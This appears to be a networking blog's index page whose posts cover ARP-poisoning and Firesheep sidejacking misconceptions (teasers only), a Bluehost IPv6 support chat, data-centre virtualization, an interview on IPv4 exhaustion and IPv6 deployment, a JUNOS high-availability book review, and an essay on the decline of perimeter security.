Man in the Middle (MITM) Attacks Explained: ARP Poisoining

It’s been over 3 weeks since Firesheep was released, and yet still there seem to be so many misconceptions about this particular vulnerability.  The most prevalent of these misconceptions is that HTTP Session Hijacking, also known as “sidejacking” is something which is limited to only wireless networks.  And this belief is not limited to just session hijacking attacks.  Somewhere along the way a myth was propagated that wired switched networks are somehow impervious to attacks like these and other similar types of attacks because of the use of collision domains and the inability of an attacker to have unfettered access to the Layer 2 medium.  As I mentioned in my previous article on the Misconceptions About Sidejacking with Firesheep, attacks like these and others are not relegated to strictly wireless networks, and in fact there are many so-called Man-in-the-Middle (MITM) attacks which can be performed on a switched wired network to compromise the imaginary security of a Layer 2 collision domain.

Continue reading “Man in the Middle (MITM) Attacks Explained: ARP Poisoining”

Bluehost IPv6 Epic Fail

Recently, I had a conversation with my hosting provider to determine if they had IPv6 support.  I’m interested in getting my web site set up and reachable via IPv6.  Below is a copy of the conversation I had with their customer support, and clearly indicates we’ve got a long way before IPv6 is ready for the masses:

stupid
Bluehost Support: Hi, how can I help you?
Stefan: Hi, I am a hosting customer and I was wondering if you currently have support for IPv6?
Bluehost Support: Let me look into that for you.
Bluehost Support: Yes, we do support IPv6.
Stefan: Great! Is there a cost associated with that and how do I go about setting that up?
Bluehost Support: I am sorry, we cannot give you IPv6 until our IP5 runs out.
Stefan: Wait, you just told me you have support for IPv6.  What the heck is IP5?
Bluehost Support: IP5 is the version before IP6.  We can’t give you an IP6 until our IP5 runs out. I am sorry for the misunderstanding.

The Misconceptions of Sidejacking with Firesheep

Unless you’ve been hiding under a rock for the past few days, you are probably well aware of the recent activity around a new Firefox extension developed by a pair of researchers that brings the issue of session hijacking front and center.  The duo behind this extension, Eric Butler and Ian “craSH” Gallagher, developed the software in order to demonstrate the vulnerabilities inherent in many web sites that don’t fully implement encryption.  The browser extension, dubbed “Firesheep“, essentially enables an attacker to grab other people’s credentials and use them to gain access to various web sites.

Continue reading “The Misconceptions of Sidejacking with Firesheep”

Tomorrow’s Data Center – Realizing the Potential of Virtualization

I’m not sure what the Data Center of tomorrow will look like, but one thing is for sure, it will most likely look a whole lot different than it does today.

We’ve seen the benefits that server virtualization brings by creating a level of abstraction between the software and the underlying hardware. But in order for the true vision of virtualization to take hold, the physical resources will themselves need to become unhinged from the physical chassis that we think of today when we think of a traditional server – be it a rackmountable server, a blade chassis, or some other type of form factor. We need to stop thinking of resources in the manner we’ve become accustomed – as a physically constrained device with finite boundaries and start thinking beyond – towards pools of resources.

Instead of the form factor of a server which consists of memory and CPU and I/O interfaces for network and storage, all of these components will need be removed and something altogether different will need to take its place. We need to start thinking in terms of blades or insertable modules which consist solely of a given set of resources (memory, compute, storage I/O, etc.). We can start pooling all these resources together to create individual compute farms or memory farms, or farms of any other type of resource with which we want the fluid ability to add capacity on the fly. Additional compute resources could be gained simply by adding another compute module to the compute farm. More memory could be added to the system by simply adding another memory blade to the memory farm. Additional bandwidth could be added to the system by simply adding another blade consisting of high density Ethernet ports to the network farm. Not only will this enable greater agility in our data center, it will also enable each resource to be scaled independently of each other – something that is difficult today given the fixed constraint server architecture where most of these resources currently exist.  And yet, even though we are creating individual farms of resources, the virtualization capabilities present in the Data Center of tomorrow will allow the network administrator to pick and choose which subsets of these resources to combine together to present to individual VMs.

Another area where we might see considerable change is to the traditional rack itself. Today the rack doesn’t offer much in the way of intelligence, it’s really just a mechanism we use to organize and situate our resources. Is it possible that the rack itself might evolve to become an underlying fabric which ties together all of these different resource pools and presents them to the resource virtualization layer in a unified fashion? Perhaps the fabric incorporated into the rack will provide the necessary connectivity between all the elements in a fashion similar to what is provided today via a traditional motherboard. Developments by Intel with their Light Peak technology might ultimately provide the high speed connectivity required in such a design.  It’s possible that even good old Ethernet might provide that connectivity as we can see is happening with FCoE and Remote Direct Memory Access over Converged Enhanced Ethernet.

And finally, something that might look a whole lot different tomorrow is the physical alignment of that rack – with racks being turned on their sides in a horizontal fashion to assist with cable management and ease of resource access. The cooling of the equipment might be done by liquid rather than traditional air current, as is being developed by companies like Green Revolution Cooling. Their GreenDEF coolant is essentially made from non-toxic mineral oil, and is not electrically conductive like water. Green Revolution Cooling’s promise is that their cooling solutions offers dramatically lower up-front costs for greenfield deployments, lower energy use, and higher performance than that gained with traditional cooling systems, with up to 45% less power and up to 95% less traditional cooling required.

Ultimately, in order for the vision of virtualization to realize it’s true potential, the physical mold we have become accustomed to will have to be broken. Resources will need to be pooled together and this just isn’t effective or scalable within the confines of the traditional server chassis as we know it today. On top of that, green computing and the desire to save money and reduce carbon footprint, coupled with efficiencies that might be gained by changing the alignment of racks and resources are going to result in a Data Center that looks fundamentally different than it does today.

Interview with Chris Grundemann, Author of ‘Day One: Exploring IPv6’

Spend a little time in Juniper, ARIN or a wide variety of other networking forums, and you’ll likely see the name Chris Grundemann.  Recently, we had the opportunity to catch up with him, and discuss the nature of his involement in deploying IPv6 at tw telecom, as well as his recently published Juniper booklet entitled “Day One: Exploring IPv6“.


Thanks Chris for joining us today.  Tell us a little bit about yourself and your career experience, and specifically tell us about your day-to-day experience working with IPv6.

Certainly. Career-wise, I am currently engaged as a Network Architect with tw telecom inc. where I am responsible for setting forward looking architectures and leading various technology development efforts. I am also the Founding Chair of the Colorado Chapter of the Internet Society, Founding Editor of Burning with the Bush and an active participant (and current AC nominee) in the ARIN policy development process. Obviously I am also the author of the Juniper “Day One: Exploring IPv6” booklet.

My day-to-day experience with IPv6 is actually pretty minimal at this point. Last year while I was still on the IP backbone team here at tw telecom, I rolled out IPv6 across all of our PE routers – in one night. Since then, there has been very little technical work needed from a networking perspective. We still have plenty of work to fully operationalize IPv6 but it is mostly systems and process issues now, much less exciting.

For any readers who are interested, you can find a lot more about me on my personal site. This includes links to my Facebook and LinkedIn profiles, so feel free to send me an invite to connect!

You rolled out IPv6 across all of your PE routers in a single night! That’s a pretty big accomplishment. Would you say that Juniper’s implementation of IPv6 made it easy to deploy and support IPv6 across a large number of devices?

Thanks! There was of course plenty of preparation leading up to that night, but we “flipped the switch” all at once and it went extremely smooth.

All of Juniper’s carrier routers forward IPv6 in hardware, which is huge. Also, IPv6 was integrated into Junos very well, most of the commands are similar if not the same between IPv4 and IPv6. This makes it really easy operationally speaking. So, yes, I would definitely agree that Juniper’s implementation of IPv6 makes it easy to deploy and scale.

Ok, so let’s specifically talk about the current state of affairs with IPv6.  Hurricane Electric, one of the leading providers of IPv6 connectivity, states that as of the time of this writing we have less than a year remaining until complete IPv4 exhaustion.  This is based on the fact that there are only sixteen /8 network blocks available for allocation (approximately 6%).    We’ve heard figures such as this for many years now, but techniques like NAT have allowed people to extend the length of the existing IPv4 address pool.  Based on your experience working with IPv6 and also your involvement with ARIN, can you help us to understand what is fact and what is fiction – how long do you really think we have before total address exhaustion becomes a reality and customers will have no choice but to start looking at IPv6 for future deployments?

Let me re-phrase your query into two distinct questions if I may: How long do we have with IPv4 and when will network operators be forced to consider IPv6 deployment? The answers are very different so I think they should be addressed individually.

First, How long do we have with IPv4? As you state, Hurricane Electric’s widget gives us less than a year. But let’s start with a quick level-set. There are actually three distinct points leading up to what I would call “complete IPv4 exhaustion.” The first is IANA unallocated pool exhaustion. This is the point when the global pool of IPv4 /8s designated for unicast routing reaches 5 remaining and subsequently each of the 5 RIRs receives one (thus depleting the unallocated pool completely). The second point is RIR exhaustion, when the Regional Internet Registries can no longer allocate nor assign IPv4 addresses that they received from IANA (because they don’t have any). Finally, true exhaustion happens when the ISPs/LIRs exhaust their remaining IPv4 addresses and end users simply cannot get a routable IPv4 address.

As I understand it, Hurricane Electric is getting their data from the IPv4 Address Report built by Geoff Huston and are predicting the date of the first point; exhaustion of the IANA IPv4 unallocated address pool. As of today that date is projected to be 1 July, 2011 – less than a year away. However, this projection is based on the current and historical run-rate, on how fast we have consumed IPv4 addresses up to this point. Because so many folks have not paid attention to IPv6 and are still wholly dependent on IPv4, it is quite likely that the run-rate will increase, perhaps drastically, as we get closer to IANA unallocated pool exhaustion. If this happens, we actually have much less than one year before reaching that first point.

Predicting the second point gets a little murkier, because different folks define this point differently. Should we declare that RIR exhaustion is upon us when the first RIR runs out of unallocated IPv4 address space? When the last one does? Perhaps when the RIR for your region has no unallocated IPv4 to give you? Mr. Huston projects the date “where the first RIR has exhausted its available pool of addresses” and since he has already done all the work, it is a convenient place to set the bar. As of today that date is predicted to be 20 January, 2012. Remember again that this does not take into account any possible run on IPv4 addresses that may happen between now and then and that other RIRs will have IANA allocated IPv4 space for some time after that date.

The final point is the hardest one to pin down. This is mostly because it would be very hard, if not impossible to quantify how much currently allocated/assigned address space is unused or underused.

Many ISPs may be able to feed off of current reserves for months or even years, while many more will run out of IPv4 addresses within weeks of receiving their last traditional allocation from their RIR.

You also have to take into account things like IPv4 address transfers which are now allowed in many regions, other possible policy changes and transition technologies such as carrier-grade-NAT (CGN). All of these things pull IPv4 use in different directions. So no one can intelligently predict this final date.

Although I cannot tell you that IPv4 will be dead in X years, there are some very important facts that we should not overlook. The first is that Geoff Huston’s projections have remained quite consistent over the past two years, and the time remaining has steadily decreased over those two years. The second is that we are running out of usable IPv4 addresses. NAT was a stop gap to allow folks time to adopt IPv6. That time has largely been wasted unfortunately. The bottom line is that IPv4 will continue to become more expensive to use on interconnected networks while IPv6 continues to become less expensive.

This is where the second question comes into play: When will network operators be forced to look at IPv6 deployment? The truth is that they should be looking into it now. If you are not adding only IPv6 capable hardware and software to your network now – you are going to be forced to spend extra money upgrading sooner than you would like. As IPv4 becomes ever more expensive (both directly as ISPs charge more for it or you are forced to pay for addresses through a transfer and indirectly as CGNs and other transition mechanisms drive up operational costs), many will turn to IPv6 – more and more as the next two years play out. Businesses that have IPv6 capable networks now will have a competitive advantage over those who are forced to upgrade their network to get IPv6 connectivity.

An often overlooked aspect of this question is security. If your network is not IPv6 enabled today, you likely have IPv6 traffic being tunneled right through your firewalls. Another is mobile access – very soon mobile phone operators will be migrating to 4G technologies that take advantage of IPv6 addressing for all new phones on their networks. These IPv6 mobile devices will be reaching your website(s) via IPv6, if you want them to have the best possible experience your site needs to be running IPv6 natively.  As soon as a website is IPv6 only, ISPs will be required to provide IPv6 connectivity or lose customers to those who do.

So, in short, the answer really is now. Everyone should be thinking of IPv6 when planning all future network deployments, starting now (if not yesterday).

Many industry experts are already speculating that an IPv4 black market will exist because of the depletion of IPv4 address space and the lack of a large IPv6 installed base. Do you suspect there will be a black market for IPv4 addresses and what impacts might this have?

The answer varies a bit depending on how you choose to define black market. Under many definitions, that market already exists. I think that it already impacts us and that it will get worse as we near and ultimately cross the free pool depletion threshold. Think spammers and phishers operating out of address blocks that they beg, borrow, steal and often “rent” or “buy.” There are also instances where much more legitimate businesses make back-room deals for the use of IP addresses.

Overall some of the most negative impacts surround the WHOIS database, and the integrity of the data it contains. When folks get addresses through grey or black markets, instead of from the RIR they are probably not going to report proper reassignment registration information to the RIR. This leads to stale WHOIS data which makes troubleshooting and abuse reporting much harder for operators and investigation much harder for law enforcement. I helped author a recently adopted ARIN policy change to start addressing some of this and am actually spearheading an effort to continue that work with another policy proposal in the ARIN region as we speak.

Another concern is prefix hijacking, this is not really a black market issue but is another facet of the problems we will face more and more as IPv4 gets more expensive, unless and until IPv6 adoption picks up across the board.

There is a lot of work going on right now within ARIN, the IETF and other RIRs to try and limit the impacts of any IPv4 black market, other abuses and also ease the overall IPv4-IPv6 transition. Anyone interested in this work should join the ARIN-PPML (Public Policy Mailing List) [http://lists.arin.net/mailman/listinfo/arin-ppml] (or their local equivalent) and/or show up at a meeting; and join the conversation. ARIN and the other RIRs are open, transparent, ground-up organizations and your voice can make a huge impact.

It has been observed that the number of Autonomous Systems supporting IPv6 as well as IPv6 DNS Queries, in the form of AAAA records, have significantly increased in the last several years.  Have we reached that critical mass where widespread adoption is imminent and if so what can we expect to see in the next few years?

I think that widespread adoption is imminent now but I don’t believe that it is an issue of critical mass, more an issue of network operators starting to see the dates we discussed above nearing. I make the distinction because there is still very little IPv6 traffic actually flowing. What I think is happening is that the folks who have been watching this are getting a sense of urgency that is finally breaking through to the folks who write the checks. The real critical mass moment will be when we see IPv6 traffic levels really climbing and IPv4 traffic growth starting to slow. I think you can expect to see that in the next few years. Within five certainly and probably within three.

Let’s talk for a minute about the Juniper “Day One” guides.  Can you tell us what they are all about, and more specifically, tell us a little bit about the “Day One: Exploring IPv6” guide that you’ve written.  What is it all about and what can potential readers hope to gain from reading it?

The Day One guides are exactly what the name implies, they are booklets that give you everything you need to know to get through your first day working on the covered topic. They are hands-on, example-driven, cut-to-the-chase primers on all sorts of topics surrounding Juniper Networks gear and the Junos OS. In “Exploring IPv6” I tried to really provide that common sense starting point for implementing IPv6. The booklet covers enabling IPv6, adding IPv6 addresses to interfaces, configuring static routes in IPv6, implementing IPv6 IGPs (RIPng, IS-IS and OSPF v3) as well as all the basic verification and troubleshooting that surrounds those topics. If you follow along through the book examples and work through all of the “try it yourself” exercises, you should gain a solid understanding of IPv6 LANs and how IPv6 is implemented in JUNOS, as well as a great general / vendor-agnostic view of IPv6 itself and how it differs from IPv4.

Tell us a little bit about the “Advanced IPv6” Day One Guide that you are currently working on?  What should the network practitioner hope to gain from reading it?

Advanced IPv6 is kind of a “Day Two” guide on IPv6 in JUNOS. It continues right where Exploring IPv6 left off and moves onto more advanced topics such as BGP, VRRP, CoS, Multicast and system management. It takes you another big step towards being able to fully implement IPv6 in a production environment.

After you are done with “Advanced IPv6” do you have any other writing aspirations?

I do. Writing is definitely work but I am finding that it’s work I really enjoy. Hopefully others like my writing in these Day One booklets and that gives me the opportunity to continue writing!

Thanks for joining us today Chris.  This has been extremely informative and we are all really excited about reading your next Day One guide and are anxiously awaiting its arrival!

Book Review :: JUNOS High Availability: Best Practices for High Network Uptime

JUNOS High Availability: Best Practices for High Network Uptime
JUNOS_High_Availabilityby James Sonderegger, Orin Blomberg, Kieran Milne, Senad Palislamovic
Paperback: 688 pages
Publisher: O’Reilly Media
ISBN-13: 978-0596523046

5starsHigh Praises for JUNOS High Availability

Building a network capable of providing connectivity for simple business applications is a fairly straightforward and well-understood process. However, building networks capable of surviving varying degrees of failure and providing connectivity for mission-critical applications is a completely different story. After all, what separates a good network from a great network is how well it can withstand failures and how rapidly it can respond to them.

While there are a great deal of books and resources available to assist the network designer in establishing simple network connectivity, there aren’t many books which discuss the protocols, technologies, and the myriad ways in which high availability can be achieved, much less tie it all together into one consistent thread. “JUNOS High Availability” does just that, in essence providing a single, concise resource covering all of the bits and pieces which are required in highly available networks, allowing the network designer to build networks capable of sustaining five, six, or even seven nines of uptime.

In general, there are a lot of misconceptions and misunderstandings amongst Network Engineers with regards to implementing high availability in Junos. One only needs to look at the fact that Graceful Restart (GR) protocol extensions and Graceful Routing Engine Switchover (GRES) are often mistaken for the same thing, thanks in no small part to the fact that these two technologies share similar letters in their acronyms. This book does a good job of clarifying the difference between the two and steers clear of the pitfalls typically prevalent in coverage of the subject matter. The chapter on ‘Control Plane High Availability’ covers the technical underpinnings of the underlying architecture on most Juniper platforms; coverage of topics like the separation between the control and forwarding planes, and kernel replication between the Master and Backup Routing Engine give the reader a solid foundation to understand concepts like Non-Stop Routing, Non-Stop Bridging, and In-Service Software Upgrades (ISSU). In particular I found this book to be very useful on several consulting engagements in which seamless high availability was required during software upgrades as the chapter on ‘Painless Software Upgrades’ discusses the methodology for achieving ISSU and provides a checklist of things to be performed before, during, and after the upgrade process. Similarly, I found the chapter on ‘Fast High Availability Protocols’ to be very informative as well, providing excellent coverage of BFD, as well as the differences between Fast Reroute vs. Link and Node Protection.

Overall I feel this book is a valuable addition to any networking library and I reference it often when I need to implement certain high availability mechanisms, or simply to evaluate the applicability of a given mechanism versus another for a certain deployment. The inclusion of factoring costs into a high availability design is a welcome addition and one that all too many authors fail to cover. Naturally, it only makes sense that costs should be factored into the equation, even when high availability is the desired end-state, in order to ensure that ultimately the business is profitable. If I had to make one suggestion for this book it is that there should be additional coverage of implementing High Availability on the SRX Series Services Gateways using JSRP, as this is a fundamental high availability component within Juniper’s line of security products. To the authors credit however, this book was written just as the SRX line was being released, so I don’t fault the authors for providing limited coverage. Perhaps more substantial coverage could be provided in the future if a Second Edition is published.

The bottom line is this – if you are a Network Engineer or Architect responsible for the continuous operation or design of mission-critical networks, “JUNOS High Availability” will undoubtedly serve as an invaluable resource. In my opinion, the chapters on ‘Control Plane High Availability’, ‘Painless Software Upgrades’, and ‘Fast High Availability Protocols’ are alone worth the entire purchase price of the book. The fact that you get a wealth of information beyond that in addition to the configuration examples provided makes this book a compelling addition to any networking library.

Reality Check: Traditional Perimeter Security is Dead!

Recently I came across a marketing event promoted by a network integrator which touted industry leading solutions to assist customers in determining “what was lurking outside their network”, as can be seen in the screenshot below. Please note all references to the company have been removed to protect the not-so-innocent.

lurking

In this day and age, it still surprises me when supposedly network savvy folks are still thinking of network security in terms of a traditional perimeter made up of firewalls or IPS devices. The truth of the matter is that the traditional perimeter vanished quite a few years ago.

Only looking at the perimeter gives the end-user a a false sense of protection. It completely fails to recognize the dangers of mobility in today’s traditional workplace environment. Users roam. They might bring in viruses or other Trojans INSIDE your network where they are free to roam unencumbered. In the worst of these cases, the perimeter is only secured in one direction, giving outbound traffic unfettered access and completely ignoring that data which might be leaked from hosts inside your network destined to hosts outside your network, as might be the case with Keyloggers or other similar types of rogue programs.

Furthermore, in today’s environment composed of virtualized machines, the line gets even blurrier which is why we are starting to see solutions from startup vendors such as Altor Networks. It’s one thing when we are dealing with physical hosts in the traditional sense, but what about the situation when you are dealing with a multitude of virtual machines on the same physical hosts which must talk to each other?

When you take a data-focused approach instead of a technology-focused approach, the problem and its solutions start to make more sense.   The perimeter should be viewed as the demarcation between the data and any I/O fabric providing connectivity between that data and some external entity. This is the domain of things like Data Loss Prevention (DLP), Network Access Control (NAC), and Virtual Hypervisor Firewalls in addition to that of traditional security devices.

trojan-horse

To deal with the realities of today, we must start to think of network security in terms of Hotels vs. Castles. In the Castle model, we have a big wall around our infrastructure. We might have a moat and some alligators, and perhaps we only lower our drawbridge for very special visitors. This model tends to keep a good majority of the enemies at bay, but it completely ignores that which might already be inside your network (think in terms of the Trojan horse as told in Virgil’s epic poem ‘The Aeneid’).

What is more commonly being employed is that of the Hotel Model.  Initially, to gain entrance into the hotel itself, we must check in with the Concierge and get our room key.  Once we have our room key, we have limited access to our own room, and perhaps some shared facilities like the pool or the gym.  In this model, we are unable to enter into a room in which we do not have access.  The key word here is LIMITED access.

An all-inclusive security posture looks at the network from a holistic point of view.  The principles of Defense-in-Depth will make evident the failings of the traditional perimeter model.  The traditional perimeter is dead.  The perimeter is wherever the data is.